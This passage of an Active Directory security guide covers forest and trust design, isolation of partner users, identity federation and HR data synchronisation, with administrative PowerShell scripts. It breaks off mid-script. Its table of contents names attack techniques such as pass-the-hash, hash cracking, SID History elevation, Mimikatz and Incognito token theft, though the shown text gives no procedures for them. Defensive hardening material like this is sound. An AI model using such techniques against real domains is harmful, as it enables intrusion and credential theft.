
TEST THE SECURITY OF YOUR ACTIVE DIRECTORY V2 (version 1.30.2017)

Msreport - Guillaume MATHIEU - All rights reserved


INTRODUCTION .... 5

1 DESIGNING A SECURE DIRECTORY THAT MEETS THE COMPANY'S NEEDS .... 6

1.1 The basics .... 6
1.2 Analyzing your company's needs .... 7
1.3 Choosing the Active Directory topology .... 8
1.3.1 Exception 1: a company with independent entities .... 8
1.3.2 Exception 2: applications that modify the Active Directory schema .... 8
1.3.3 Exception 3: hosting .... 8
1.3.4 Exception 4: legal constraints .... 8
1.3.5 Exception 5: working with competitors .... 9
1.3.6 Exception 6: applications hosted in the cloud .... 10
1.4 Using Active Directory as the corporate directory .... 11
1.4.1 Synchronizing the directory with other data sources (HR databases, etc.) .... 11
1.4.2 Synchronizing Azure Active Directory with Active Directory .... 11
1.4.3 Hosting enterprise data in Active Directory .... 13
1.4.4 How and by whom should these attributes be administered? .... 14
1.4.5 Protecting attributes that contain sensitive data .... 16
1.4.6 Allowing a user to view the value of a protected attribute .... 18
1.5 Strengthening the security of the DNS service .... 19
1.5.1 What is the connection between Active Directory and DNS? .... 19
1.5.2 Dynamic DNS updates .... 20
1.5.3 What attacks are possible with DNS? .... 25
1.5.4 Securing your DNS servers .... 26
1.6 Privilege elevation using the SID History .... 32
1.6.1 Elevating privileges with the SID History .... 32
1.6.2 Removing the SID History .... 39

2 GOOD PRACTICES FOR DELEGATING THE ADMINISTRATION OF YOUR DIRECTORY .... 40

2.1 Basic principles of administration delegation .... 40
2.1.1 The different types of Active Directory administrators .... 40
2.1.2 Groups with administrative privileges .... 40
2.1.3 Delegating administration to a standard user .... 41
2.2 Delegating administration with organizational units .... 49
2.3 Creating named accounts dedicated to administration .... 49
2.4 Delegating only what is necessary, and only temporarily .... 49
2.5 Disabling the Guest account and renaming the Administrator account .... 49
2.6 Auditing permissions on Active Directory objects .... 50
2.7 Auditing the permissions of the AdminSDHolder object .... 50
2.8 Enabling a password-protected screen lock .... 53
2.9 Disabling inactive accounts .... 54
2.10 Third-party tools to streamline administration delegation .... 56

3 DEFINING A CORPORATE PASSWORD POLICY .... 59

3.1 Analyzing the company's needs for the password policy .... 59
3.2 Reducing the number of different logins / passwords .... 60
3.2.1 Limiting the number of logins / passwords to remember .... 60
3.2.2 Configuring your applications to authenticate with Active Directory .... 60
3.2.3 Using the Windows vault (Credential Manager) .... 61
3.2.4 Using identity federation protocols .... 61
3.3 Microsoft password management tools .... 62
3.3.1 Password policies in the Default Domain Policy .... 62
3.3.2 PSOs (fine-grained password policies) .... 64
3.4 Third-party password management tools .... 64
3.4.1 Resetting one's password without contacting the IT team .... 65
3.4.2 Ensuring the identity of the user .... 65
3.4.3 Configuring password complexity .... 65
3.5 Transmitting a password to a user over the network .... 66
3.6 Using MSA and gMSA objects for services and scheduled tasks .... 66
3.7 Listing all accounts that have not changed their password for several years .... 69
3.8 Resetting user passwords with smart cards .... 70
3.9 Restricting the use of the "Password never expires" option .... 70
3.10 Password storage in Active Directory .... 71
3.10.1 What is a hash (fingerprint)? .... 71
3.10.2 The LM hash (LAN Manager hash) .... 71
3.10.3 The NT hash (NT LAN Manager hash) .... 72
3.11 Recovering a user's password from the LM hash .... 74
3.11.1 The procedure .... 74
3.11.2 How to disable the LM hash .... 77
3.12 Recovering a user's password from the NT hash .... 79
3.12.1 The procedure .... 79
3.12.2 How to protect passwords .... 82
3.13 Protecting passwords stored on Windows machines .... 83
3.13.1 Services and scheduled tasks .... 83
3.13.2 The Windows session cache .... 84
3.14 Managing the local SAM database of your machines with Microsoft LAPS .... 86
3.15 Defining a target password policy .... 89

4 STRENGTHENING THE SECURITY OF AUTHENTICATION PROTOCOLS .... 90

4.1 The LDAP protocol .... 90
4.1.1 LDAP Simple Bind .... 90
4.1.2 LDAP SASL Bind .... 90
4.2 Presentation of the NTLM v2 protocol .... 91
4.3 Presentation of the Kerberos v5 protocol .... 92
4.4 Kerberos authentication delegation .... 96
4.5 Good practices to improve the security of an Active Directory .... 98
4.5.1 Blocking LDAP Simple Bind connections without SSL/TLS .... 98
4.5.2 Enabling LDAP traffic signing .... 98
4.5.3 Disabling the NTLM authentication protocols .... 101
4.5.4 Configuring the Kerberos encryption algorithms .... 104
4.5.5 Configuring time synchronization .... 106
4.5.6 Prohibiting Kerberos delegation for administrative accounts .... 107
4.6 Privilege elevation with the NTLM Pass the Hash technique .... 108
4.6.1 Understanding the NTLM Pass the Hash attack .... 108
4.6.2 The NTLM Pass the Hash attack procedure .... 109
4.6.3 Protecting against NTLM Pass the Hash attacks .... 109
4.7 Protecting against Kerberos Pass the Ticket attacks with a tool such as Mimikatz .... 109

5 MANAGING PERMISSIONS WITH ACTIVE DIRECTORY .... 110

5.1 The SID .... 110
5.2 Permissions .... 111
5.3 Privileges .... 113
5.4 Processes .... 115
5.5 Services .... 115
5.6 Access tokens .... 119
5.7 Privilege elevation by stealing an access token .... 121
5.7.1 Presentation of the INCOGNITO tool .... 121
5.7.2 How to use the INCOGNITO tool .... 122
5.7.3 How to block the INCOGNITO tool? .... 122

6 INDUSTRIALIZING AND SECURING THE DEPLOYMENT OF DOMAIN CONTROLLERS .... 123

6.1 Deploying only a supported version of Windows Server .... 123
6.2 Hosting domain controllers in a secure location .... 124
6.2.1 What are the risks if an attacker has physical access to a domain controller? .... 124
6.2.2 How to prevent an attacker from accessing the Ntds.dit file? .... 127
6.3 Deploying security patches on domain controllers .... 128
6.3.1 Why is it necessary to deploy security patches? .... 128
6.3.2 Installing security patches on domain controllers .... 131
6.4 Reducing the attack surface of domain controllers .... 131
6.5 Never stopping the Windows Firewall service .... 132
6.6 UAC (User Account Control) .... 134
6.7 Disabling offline session caching .... 137
6.8 Strengthening Remote Desktop security .... 138
6.8.1 Using administrative workstations .... 138
6.8.2 Configuring the Remote Desktop service .... 139
6.8.3 Allowing only administration tools .... 140
6.8.4 Configuring the Remote Desktop client .... 141
6.8.5 Using "restrictedAdmin" mode .... 141
6.9 Restricting Internet access from domain controllers .... 143
6.10 The DSRM password .... 144
6.11 Deploying a standard configuration on all domain controllers .... 144
6.11.1 Configuring IPv6 .... 144
6.11.2 Deploying an up-to-date antivirus and configuring exclusions .... 145
6.11.3 Using the Security Configuration Wizard .... 146
6.11.4 Testing your image in a qualification environment .... 149
6.11.5 Some feedback from Windows 2012 R2 deployments .... 150

7 IMPLEMENTING A RISK PREVENTION POLICY .... 152

7.1 Auditing changes (new objects) and tracing permissions in Active Directory with Windows auditing .... 152
7.2 Analyzing the Security log .... 155
7.3 Auditing the security of your directory .... 170
7.4 Monitoring your Active Directory .... 171
7.4.1 Presentation of the DCDIAG tool .... 172
7.4.2 Deployment of the solution .... 172
7.5 Having an Active Directory IT recovery plan (IRP) .... 173
7.6 Protecting your Active Directory backups and IFM (Install From Media) files .... 173

8 APPENDICES .... 175

8.1 Procedure for deploying a Microsoft certification authority .... 175
8.2 Procedure for enabling BitLocker on a domain controller .... 178
8.2.1 Presentation of the solution for encrypting domain controller hard drives .... 178
8.2.2 Implementing BitLocker on Windows 2012 R2 domain controllers .... 179
8.3 Bibliography .... 186
8.3.1 Recommended book .... 186
8.3.2 Microsoft Active Directory technical specification .... 186
8.3.3 Understanding NTLM and Kerberos in Active Directory .... 186
8.3.4 ANSSI recommendations on Active Directory security .... 186
8.3.5 Microsoft recommendations on Active Directory security .... 186
8.3.6 Recommendations on Terminal Services configuration .... 186
8.3.7 Other links .... 186



INTRODUCTION

At the end of 2014, many studies showed that CIOs have two main priorities:

1. Migration to cloud services such as Office 365 and Windows Azure, to improve the reliability and/or reduce the cost of the services provided by the IT department.

2. Strengthening the security of their IT infrastructure. The year 2013 was marked by Edward SNOWDEN's revelations about NSA practices. The year 2014 was marked by the hacking of Sony Pictures and the leak of confidential data.

These two topics directly affect the Active Directory domain infrastructure. Cloud projects require an infrastructure that allows users to authenticate with their Active Directory login / password to access services hosted online. Strengthening the security of the IT infrastructure goes through strengthening the security of Active Directory: remember that an Active Directory domain administrator is, by default, a local administrator of every machine in the domain (servers and workstations).

In this document, we will see how to:

• Design an Active Directory that is secure and meets the company's needs.
• Delegate the administration of your Active Directory.
• Define a corporate password policy.
• Strengthen the security of the Active Directory authentication protocols.
• Manage permissions with Active Directory.
• Industrialize and secure the deployment of domain controllers.
• Set up a risk prevention policy.



1 DESIGNING A SECURE DIRECTORY THAT MEETS THE COMPANY'S NEEDS

1.1 THE BASICS

Microsoft's Active Directory is organized around four types of objects: forests, domains, organizational units and trust relationships.

A forest is a set of domains that share the same configuration, the same schema and the same global catalog. Within a forest, each domain trusts, directly or indirectly, all the other domains of the forest. These trust relationships cannot be deleted. The forest is the security boundary of Active Directory: to ensure that the users of one entity have no access to the directory of another entity, two separate forests must be created.

A domain is a partition of an Active Directory forest. The default administrative owner of a domain is that domain's Domain Admins group. The Enterprise Admins group, which has permissions on all objects in all domains of the forest, is located in the forest root domain. An administrator of the forest root domain can therefore obtain full rights over all domains of the forest. This is usually why the root domain is left unused in designs that feature a forest with multiple domains.

An organizational unit (OU) is a container within a domain. An OU can contain user accounts, groups, computer accounts and other OUs (among other things). OUs therefore make it possible to organize the directory. It is possible to delegate the administration of the contents of an OU to a specific group and/or user, and to apply group policies to the users and computers located in that OU.

A trust relationship is established between two Active Directory domains (or between an Active Directory domain and a Windows NT4 domain, or between an Active Directory domain and a non-Windows Kerberos realm). When domain A trusts domain B, the administrators of domain A can set permissions on a machine of domain A for users / groups / computers of domain B. Users of domain B can thus access resources of domain A. Trust relationships also extend the scope of the Authenticated Users group to both domains. By default, this group has the right to log on to a Windows workstation and many permissions on the file system. In forests at the Windows Server 2003 functional level, it is possible to create trust relationships with selective authentication. With this type of trust, the scope of the Authenticated Users group is not extended. To allow a user of domain B to access the server SRV2012B in domain A, an administrator of domain A must grant the Allowed to authenticate right to the domain B user account on the SRV2012B computer account in domain A.

When a trust relationship is established, a TDO (Trusted Domain Object) is created in the System container of each of the two domains. A special user account is also created in the Users container for compatibility with NT4 domains. For more information about trust relationships, I invite you to read chapter 6, on trust relationships, of the following document:
http://www.ssi.gouv.fr/IMG/pdf/Aurelien_Bordes_-_Secrets_d_authentification_episode_II_Kerberos_contre-attaque.pdf
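As an added example (not part of the original document), the following PowerShell inventories the trust relationships of a domain from the objects described above: the trustedDomain objects (TDOs) in CN=System and the companion interdomain trust accounts in CN=Users. It assumes the ActiveDirectory module and a domain account with read access; the flag that marks an inter-forest trust as worth reviewing is the absence of selective authentication, which, as explained above, extends the Authenticated Users scope to the partner's users.

```powershell
# Added example, not code from the original document. Requires the ActiveDirectory
# PowerShell module (RSAT) and a domain account with read access to the directory.
Import-Module ActiveDirectory

function Get-TrustInventory {
    param([string]$Domain = (Get-ADDomain).DNSRoot)   # default: the current domain

    $domainDN = (Get-ADDomain -Identity $Domain).DistinguishedName

    # Get-ADTrust decodes trustAttributes into booleans; index its results by DN.
    $decoded = @{}
    Get-ADTrust -Filter * -Server $Domain | ForEach-Object { $decoded[$_.DistinguishedName] = $_ }

    # Every trust is materialised as a trustedDomain object (TDO) in CN=System.
    Get-ADObject -Server $Domain -SearchBase "CN=System,$domainDN" -SearchScope OneLevel `
        -LDAPFilter '(objectClass=trustedDomain)' `
        -Properties trustPartner, flatName, whenCreated |
        ForEach-Object {
            $t = $decoded[$_.DistinguishedName]
            [pscustomobject]@{
                Partner                 = $_.trustPartner
                NetBIOSName             = $_.flatName
                Direction               = $t.Direction
                IntraForest             = $t.IntraForest
                ForestTransitive        = $t.ForestTransitive
                SelectiveAuthentication = $t.SelectiveAuthentication
                SIDFilteringQuarantined = $t.SIDFilteringQuarantined
                Created                 = $_.whenCreated
                # A trust outside the forest without selective authentication extends
                # the Authenticated Users scope to the partner's users: review it.
                Review = (-not $t.IntraForest) -and (-not $t.SelectiveAuthentication)
            }
        }
}

function Get-TrustAccount {
    param([string]$Domain = (Get-ADDomain).DNSRoot)
    $domainDN = (Get-ADDomain -Identity $Domain).DistinguishedName
    # The account kept for NT4 compatibility is an interdomain trust account:
    # sAMAccountType 805306370 (SAM_TRUST_ACCOUNT), named "<NETBIOS>$".
    Get-ADObject -Server $Domain -SearchBase "CN=Users,$domainDN" `
        -LDAPFilter '(sAMAccountType=805306370)' -Properties sAMAccountName, whenCreated |
        Select-Object sAMAccountName, whenCreated, DistinguishedName
}

Get-TrustInventory | Sort-Object Review -Descending | Format-Table -AutoSize
Get-TrustAccount   | Format-Table -AutoSize
```

Run it from each domain of the forest (intra-forest trusts are listed too, and the document reminds us that those cannot be removed or restricted); any row with Review set to True is a trust whose partner users are Authenticated Users on every machine of the domain.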

1.2 ANALYZING YOUR COMPANY'S NEEDS

The topology of your Active Directory (forests, domains, organizational units) must match the needs of your company. Before designing your directory architecture, you need to analyze how your company operates.

How is your company organized?

Is your company split into several entities / subsidiaries? Do the users of each entity need to work with the users of the other entities? Several entities of a company can share the same directory architecture while remaining independent from the rest of the company.

Do you have centralized or decentralized IT management (one IT department per entity of your company)?

What are the technical constraints of your company?

Do you have applications that modify the Active Directory schema, such as Exchange, Lync or SCCM, or that store their configuration in Active Directory (usually in the configuration partition)?

Do you host servers, applications and data for your customers? Do you publish applications on the Internet (extranet, email, business applications)? Do you give providers or partners access to your information system? Could these providers / partners become potential competitors? What is the risk of data theft?

What are the legal constraints of your company?

Some entities are subject to legal constraints that require them to have their own information system, isolated from the other entities of the company. This is especially true for entities working in finance, defense and government institutions.

What data do I store in my Active Directory?

Active Directory is an LDAP directory. It is mainly used to authenticate users, but it can also host information about user accounts such as telephone number, email address, employee number and type of account (supplier, employee, service account).

1.3 CHOOSING THE ACTIVE DIRECTORY TOPOLOGY

The more domains / forests you add to an Active Directory architecture, the more complex its administration becomes. For this reason, the preferred Active Directory architecture is a single forest with a single domain, with some exceptions / special cases.

1.3.1 EXCEPTION 1: A COMPANY WITH INDEPENDENT ENTITIES

Create a dedicated forest with one domain for an entity of the company if these two conditions are met:
• The management of the company wants to sell this entity in the short term.
• Exchanges between the users of this entity and those of the other entities of the company are limited (management only).

1.3.2 EXCEPTION 2: APPLICATIONS THAT MODIFY THE ACTIVE DIRECTORY SCHEMA

Create a dedicated forest with one domain to host applications that modify the Active Directory schema. This applies especially to internally developed applications that need to create specific attributes / object classes: it is not possible to delete an attribute / object class once it has been added to the Active Directory schema. It applies partially to applications such as Microsoft Exchange and Microsoft Lync, because Microsoft tests the compatibility of the schema extensions of its different applications. Note, however, two known issues:

• OCS 2007 R2 (former trade name of Lync) no longer works correctly after the Active Directory schema update required to deploy Windows 2008 R2 domain controllers. The solution is to reapply the OCS 2007 R2 schema extension after the schema extension for Windows 2008 R2 domain controllers:

http://support.microsoft.com/kb/982020/en-us

• It is not possible to run the schema extension for OCS 2007 R2 after the schema has been updated for Lync 2010. This can cause problems in a migration from LCS 2005 to Lync 2010 (going through OCS 2007 R2). This problem is very serious because the only solution is to completely restore the forest (Forest Recovery). I invite you to read this article carefully: http://blogs.technet.com/b/askpfeplat/arc

In all cases, a schema update must be tested in a qualification environment that is a copy of the production environment. A complete walkthrough for creating this type of environment is available at the following address: http://msreport.free.fr/?p=154 .
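Before a schema update or a migration of the kind described above, it helps to know exactly which classes and attributes were added by applications, since they cannot be removed afterwards. The following PowerShell is an added example (not from the original document); it assumes the ActiveDirectory module and relies on the FLAG_SCHEMA_BASE_OBJECT bit (0x10) of systemFlags, which base-schema objects carry. Treat the output as a starting list to review: schema objects introduced by later Windows adprep versions may be flagged differently from a customer or vendor extension.

```powershell
# Added example, not code from the original document. Requires the ActiveDirectory module.
Import-Module ActiveDirectory

function Get-SchemaExtension {
    # The schema partition is shared by the whole forest.
    $schemaNC = (Get-ADRootDSE).schemaNamingContext

    # Base-schema objects carry FLAG_SCHEMA_BASE_OBJECT (0x10 = 16) in systemFlags.
    # 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule; negating it keeps
    # the attributes and classes where that bit is clear (or systemFlags is absent),
    # i.e. those added by an application (Exchange, Lync/OCS, SCCM) or developed in-house.
    $filter = '(&(|(objectClass=attributeSchema)(objectClass=classSchema))' +
              '(!(systemFlags:1.2.840.113556.1.4.803:=16)))'

    Get-ADObject -SearchBase $schemaNC -SearchScope OneLevel -LDAPFilter $filter `
        -Properties lDAPDisplayName, attributeID, governsID, whenCreated, isDefunct |
        ForEach-Object {
            [pscustomobject]@{
                Name    = $_.lDAPDisplayName
                Kind    = $_.ObjectClass                       # attributeSchema or classSchema
                OID     = if ($_.attributeID) { $_.attributeID } else { $_.governsID }
                Created = $_.whenCreated                         # groups one application's extension
                Defunct = [bool]$_.isDefunct                     # deactivated: the closest thing to deletion
            }
        }
}

# Sorting by creation date groups the objects added by the same schema extension.
Get-SchemaExtension | Sort-Object Created, Name | Format-Table -AutoSize
```

The OID prefix and the creation date are usually enough to attribute each group of objects to the application that created them; anything with an unknown prefix is the internally developed extension the section warns about.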

1.3.3 EXCEPTION 3: HOSTING

If you are a hosting provider, I invite you to deploy a dedicated forest to authenticate the users of your company and a second forest to authenticate your customers (or even one forest per customer). You can set up a trust relationship with selective authentication to allow the IT staff of your company to administer the forests dedicated to your customers.

1.3.4 EXCEPTION 4: LEGAL CONSTRAINTS

If the activity of one of your entities or departments requires complete isolation, you must create a dedicated forest with one domain for this entity / department and establish a trust relationship with selective authentication (if you need to share resources between entities).



1.3.5 EXCEPTION 5: WORKING WITH COMPETITORS

Several solutions are possible if you provide access to your business applications to employees of another company that is a partner on one project while being a competitor on other matters / projects.

• Solution 1: create Active Directory user accounts for these users in your domain.

• Solution 2: create another domain in your forest for these users.

• Solution 3: create the accounts of the external users in a second forest and establish a trust relationship with selective authentication.

• Solution 4: create local accounts on the workstations and servers on which the partner has to work.

• Solution 5: use an identity federation solution (ADFS, Ping Identity or other). Your partner can then authenticate its users with the accounts of its own directory to access your application. Your application must support identity federation protocols such as SAML.

1.3.5.1 Solution 1: use the production domain

All domain users are members of the Authenticated Users group and of the Domain Users group. The user accounts created for providers / competitors therefore have access to all machines of the domain. To restrict this access, apply the following procedure:

1. Create the group GG_EXTERNAL_USERS.

2. Add the external users to the group GG_EXTERNAL_USERS.

3. Configure each external user account so that it cannot log on to some machines. To do this, open the properties of the user account, go to the Account tab, click the Log On To button and check The following computers. Enter the list of machines on which the user may log on. The underlying attribute manages up to 1024 values. This method prevents local logon, but the user can still access unauthorized machines over the network (access to shares). An alternative is to configure the GPO setting Deny log on locally for the group GG_EXTERNAL_USERS and apply the GPO to all domain machines except those to which external users are allowed to connect.

4. Configure the GPO setting Deny access to this computer from the network for the group GG_EXTERNAL_USERS and apply this GPO to the Windows machines reserved for internal users. This setting prevents external users from accessing internal resources.
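The directory side of this procedure (steps 1 to 3) scripted in PowerShell, as an added example that is not part of the original document. The group name is the one used above; the machine names and the account name are constructed placeholders, and the ActiveDirectory module is assumed. A third function lists the members of the group that have no Log On To restriction at all, which is the gap an auditor looks for once the procedure is in place.

```powershell
# Added example, not code from the original document. Requires the ActiveDirectory module
# and an account delegated to create groups and modify user accounts in the target OU.
Import-Module ActiveDirectory

$GroupName    = 'GG_EXTERNAL_USERS'
$AllowedHosts = @('SRV-PROJECT01', 'WKS-EXT01')   # constructed placeholders: machines the partner may log on to

function New-ExternalUsersGroup {
    param([string]$Name = $GroupName)
    # Step 1: create the group once (global security group).
    if (-not (Get-ADGroup -Filter "Name -eq '$Name'")) {
        New-ADGroup -Name $Name -GroupScope Global -GroupCategory Security `
            -Description 'External / partner accounts (restricted logon)'
    }
    Get-ADGroup -Identity $Name
}

function Set-ExternalUserRestriction {
    param(
        [Parameter(Mandatory)][string]$SamAccountName,
        [string[]]$Computers = $AllowedHosts
    )
    # Step 2: membership drives the two GPO deny rights.
    Add-ADGroupMember -Identity $GroupName -Members $SamAccountName

    # Step 3: Account tab > Log On To > The following computers. -LogonWorkstations
    # writes the userWorkstations attribute, a comma-separated list of NetBIOS names.
    Set-ADUser -Identity $SamAccountName -LogonWorkstations ($Computers -join ',')
}

function Get-ExternalUserWithoutRestriction {
    # Members of the group with no Log On To value: for them only the GPO deny rights apply.
    Get-ADGroupMember -Identity $GroupName -Recursive |
        Where-Object { $_.objectClass -eq 'user' } |
        Get-ADUser -Properties LogonWorkstations |
        Where-Object { [string]::IsNullOrEmpty($_.LogonWorkstations) } |
        Select-Object SamAccountName, Enabled, DistinguishedName
}

# Usage with a constructed account name:
New-ExternalUsersGroup | Out-Null
Set-ExternalUserRestriction -SamAccountName 'ext.partner01'
Get-ExternalUserWithoutRestriction
```

Steps 3 (alternative) and 4 are User Rights Assignment settings (Deny log on locally, Deny access to this computer from the network, under Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies) and are set in the Group Policy Management console rather than with the ActiveDirectory module.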

1.3.5.2 Solution 2: create a new domain in the forest

This solution brings nothing in terms of security. In addition, Active Directory environments whose forests contain several domains are more complex to manage (DNS configuration, increased number of required domain controllers). By default, Active Directory creates trust relationships between the domains of the same forest that cannot be removed and on which selective authentication cannot be enabled. A user of domain A will be an Authenticated User in domain B and vice versa. We are left with the same security limits as in Solution 1.

1.3.5.3 Solution 3: create a domain in a new forest

This is the scenario that offers the best level of security. The principle is:
1. Create a domain in a separate forest.
2. Create a two-way trust (or a one-way trust as needed) between the two forests (inter-forest trust relationship).
3. Enable selective authentication on the trust relationship.
4. Configure access in the domains. To give a user of domain X (forest X) access to a resource Y1 that is a member of domain Y (forest Y),
you must grant the right Allowed to authenticate on the computer account of machine Y1 to the user of domain X (forest X). Otherwise, when
the user tries to access the resource, the following error message appears:

Logon Failure: The machine you are logging onto is protected by an authentication firewall. The specified account is not allowed to
authenticate to the machine.

You must therefore configure the permissions on the computer accounts of the resource servers (permission Allowed to authenticate).

The solution is very secure by default but has the following disadvantage: you have two Active Directories to manage.

Some applications cannot authenticate accounts from two separate forests. It is nevertheless mandatory to enable selective authentication on
the trust relationship; otherwise we face the same constraints as in scenarios 1 and 2.
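Step 4 of this scenario done from the resource forest, as an added PowerShell example that is not part of the original document: it adds an Allowed to authenticate ACE for a user of forest X on the computer account of a server in forest Y, and lists who already holds that right. The server name y1, the forest X domain controller dc1.x.local and the user jdoe are constructed sample names; the GUID is the well-known Allowed-To-Authenticate control access right.

```powershell
# Added example (not from the original document): grant "Allowed to
# authenticate" on a resource server's computer account so that a user from
# the trusted forest can reach it when selective authentication is enabled.
# Assumptions: run in the resource forest (Y) with the ActiveDirectory module;
# 'y1', 'dc1.x.local' and 'jdoe' are constructed sample names.
Import-Module ActiveDirectory

# Well-known GUID of the Allowed-To-Authenticate control access right.
$allowedToAuthenticate = [Guid]'68b1d179-0d15-4d4f-ab71-46152e79a7bc'

function Grant-AllowedToAuthenticate {
    param(
        [string]$ComputerName,   # computer account in the resource forest (Y)
        [string]$UserName,       # user in the account forest (X)
        [string]$UserForestDC    # a DC of forest X, used to resolve the user's SID
    )
    $computer = Get-ADComputer -Identity $ComputerName
    $userSid  = (Get-ADUser -Identity $UserName -Server $UserForestDC).SID

    # The AD: drive comes with the ActiveDirectory module; directory object
    # ACLs are edited through it like file system ACLs.
    $path = 'AD:\' + $computer.DistinguishedName
    $acl  = Get-Acl -Path $path

    $rule = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
        $userSid,
        [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight,
        [System.Security.AccessControl.AccessControlType]::Allow,
        $allowedToAuthenticate)
    $acl.AddAccessRule($rule)
    Set-Acl -Path $path -AclObject $acl
}

function Get-AllowedToAuthenticateTrustees {
    # Audit helper: which trustees hold the right on a given computer account.
    param([string]$ComputerName)
    $computer = Get-ADComputer -Identity $ComputerName
    (Get-Acl -Path ('AD:\' + $computer.DistinguishedName)).Access |
        Where-Object { $_.ObjectType -eq $allowedToAuthenticate -and
                       $_.AccessControlType -eq 'Allow' } |
        Select-Object IdentityReference, IsInherited
}

Grant-AllowedToAuthenticate -ComputerName 'y1' -UserName 'jdoe' -UserForestDC 'dc1.x.local'
Get-AllowedToAuthenticateTrustees -ComputerName 'y1' | Format-Table -AutoSize
```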

1.3.5.4 Solution 4: create local accounts

This solution may work if local users do not have the right administrator on local stations. Wherever possible, the machines (servers /
workstations) should then be in a workgroup. We will see in the following paragraphs a local administrator who has the privilege debug programs for
privilege elevations by performing a type of attack Pass the NTLM HASH or Pass the Kerberos ticket.

1.3.6 EXCEPTION 6: APPLICATIONS HOSTED IN THE CLOUD

In general, applications hosted in the Cloud offer two authentication methods:

• Authentication with the application's own local directory: this mode lets users access the service without any particular configuration but
requires the user to remember a new login / password. We will see that it is necessary to minimize the number of logins / passwords that
the user must remember in order to enhance the security of Active Directory.

• Authentication against the company's Active Directory / LDAP directory: these applications usually allow this through support for identity
federation protocols such as SAML (Security Assertion Markup Language).

Identity federation protocols are based on four elements:

• The principal: it is the user account that wants to access the application in the Cloud.
• The identity provider (or IDP): it is the Active Directory (or another LDAP directory).
• The service provider (SP): it is the application in the Cloud (Salesforce, Office 365 ...).
• The identity federation solution: it creates a trust relationship between the IDP (Active Directory) and the SP (the Cloud application).
The goal is to allow users to access / authenticate to the Cloud application (Salesforce, Office 365) with their Active Directory user account
without giving the Cloud application direct access to the directory. Ping Identity or Microsoft ADFS are identity federation solutions.

How it works (e.g. with an SP-initiated scenario):

The principal requests access to the services of the service provider. The service provider then asks the principal for a token (SAML for
example) issued by the identity federation solution (Ping Identity servers, Microsoft ADFS ...). The identity federation solution builds the token
from the information exchanged with the identity provider (Active Directory or an LDAP directory) and sends it to the principal. The principal
presents this token to the service provider (the Cloud application). The Cloud application then generates a cookie or a ticket that gives the user
access to the application.

The advantage of this solution is that the hosted application does not have direct access to the directory. The application only has access to
the identity federation server.
The trust relationship applies only to a specific application. The scope of this trust relationship is more restricted than that of an Active
Directory trust relationship.

I invite you to read the documentation of the PingFederate solution to better understand identity federation protocols (example
implementation with Office 365):
http://documentation.pingidentity.com/display/PF66/PDF+Downloads
http://documentation.pingidentity.com/pages/viewpage.action?pageId=10518544
Sample implementation with Office 365: http://technet.microsoft.com/fr-fr/library/jj205456.aspx
There is also an open source solution called Shibboleth (https://shibboleth.net/about).

If you do not want to implement an identity federation solution, you must create a trust relationship with selective authentication between your
forest (containing your user accounts) and the forest that contains the resources used by the application hosted in the Cloud. This reduces the
security level of your directory.

It is not recommended to create a standard user account and open LDAP / LDAPS access for it. With this account, the Cloud application
provider would have read-only access to almost all directory data (including the configuration of the directory).

1.4 USING ACTIVE DIRECTORY AS A CORPORATE DIRECTORY

Active Directory is a standard LDAP directory that can be used to host data about your users (contact details, HR information) such as the
phone number, email address, employee number, type of account (supplier, employee, service account), department, entity or function.

Applications that rely on Active Directory, such as Exchange, Lync and SharePoint, have access to this data. A user can thus find, via the email
client (Outlook, OWA ...), the contact information (phone, address ...) of another user. Hosting HR business data in Active Directory, however,
raises the following questions:

• How to replicate data from HR databases to Active Directory?
• How to host all the data in Active Directory?
• How and who should administer these attributes?
• How to protect attributes containing sensitive data?
• How to make sure a standard user cannot see the value of certain attributes (containing confidential data)?
• How to synchronize Active Directory with other directories?

1.4.1 SYNCHRONIZING THE DIRECTORY WITH OTHER DATA SOURCES (HR DATABASES ...)

Synchronization solutions between different data sources (SQL Server, LDAP) such as Forefront Identity Manager (FIM / MIM 2016) or Talend
Open Studio for Data Integration exist, but their implementation cost is significant (licensing, services). A simpler alternative is to export the
HR database to CSV and use a PowerShell script to update the attributes of the user accounts. The PowerShell import script can be run every
day or every hour.

The PowerShell script below, for example, creates user accounts in Active Directory from a CSV file. The CSV file must be semicolon-separated
and contain the columns prenom (first name), nom (name), tel, login and mdp (password) for each user to create.

Import-Module ActiveDirectory
# Import the HR export; -UseCulture reads the list separator of the current locale (";" in a French locale)
$Base = Import-Csv -Path C:\adm\base.csv -UseCulture
foreach ($line in $Base) {
    # Create the account from the CSV columns prenom, nom, tel and login
    New-ADUser -GivenName $($line.prenom) -Name $($line.nom) -OfficePhone $($line.tel) -SamAccountName $($line.login)
    # Set the initial password from the mdp column, then enable the account
    $passwd2 = ConvertTo-SecureString -String $($line.mdp) -AsPlainText -Force
    Set-ADAccountPassword -Identity $($line.login) -NewPassword $passwd2
    Enable-ADAccount -Identity $($line.login)
}
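The other half of the scheduled import, updating the attributes of accounts that already exist, as an added PowerShell example that is not part of the original document. It maps constructed HR columns (matricule, service, fonction, tel) to the standard attributes employeeNumber, department, title and telephoneNumber, changes only what differs, clears values HR no longer provides, and returns a per-account report; the CSV path is a constructed sample.

```powershell
# Added example (not from the original document): update HR attributes of
# existing accounts from a semicolon-separated CSV export and report changes.
# Assumptions: ActiveDirectory module; constructed CSV columns
# login;matricule;service;fonction;tel and a constructed file path.
Import-Module ActiveDirectory

$csvPath = 'C:\adm\rh_export.csv'   # constructed sample path

# CSV column -> Active Directory attribute (LDAP display name)
$mapping = @{
    matricule = 'employeeNumber'
    service   = 'department'
    fonction  = 'title'
    tel       = 'telephoneNumber'
}

function Update-UserFromHr {
    param([object]$Row)
    $user = Get-ADUser -Filter "SamAccountName -eq '$($Row.login)'" `
                       -Properties @($mapping.Values)
    if (-not $user) {
        return [pscustomobject]@{ Login = $Row.login; Status = 'NOT FOUND'; Changes = '' }
    }
    $replace = @{}
    $clear   = @()
    foreach ($column in $mapping.Keys) {
        $attr = $mapping[$column]
        $new  = $Row.$column
        $old  = $user.$attr
        if ([string]::IsNullOrWhiteSpace($new)) {
            # HR no longer provides a value: clear the attribute rather than
            # leaving stale data in the directory.
            if ($old) { $clear += $attr }
        } elseif ($old -ne $new) {
            $replace[$attr] = $new
        }
    }
    if ($replace.Count -gt 0) { Set-ADUser -Identity $user -Replace $replace }
    if ($clear.Count -gt 0)   { Set-ADUser -Identity $user -Clear $clear }
    $changed = ($replace.Count + $clear.Count) -gt 0
    [pscustomobject]@{
        Login   = $Row.login
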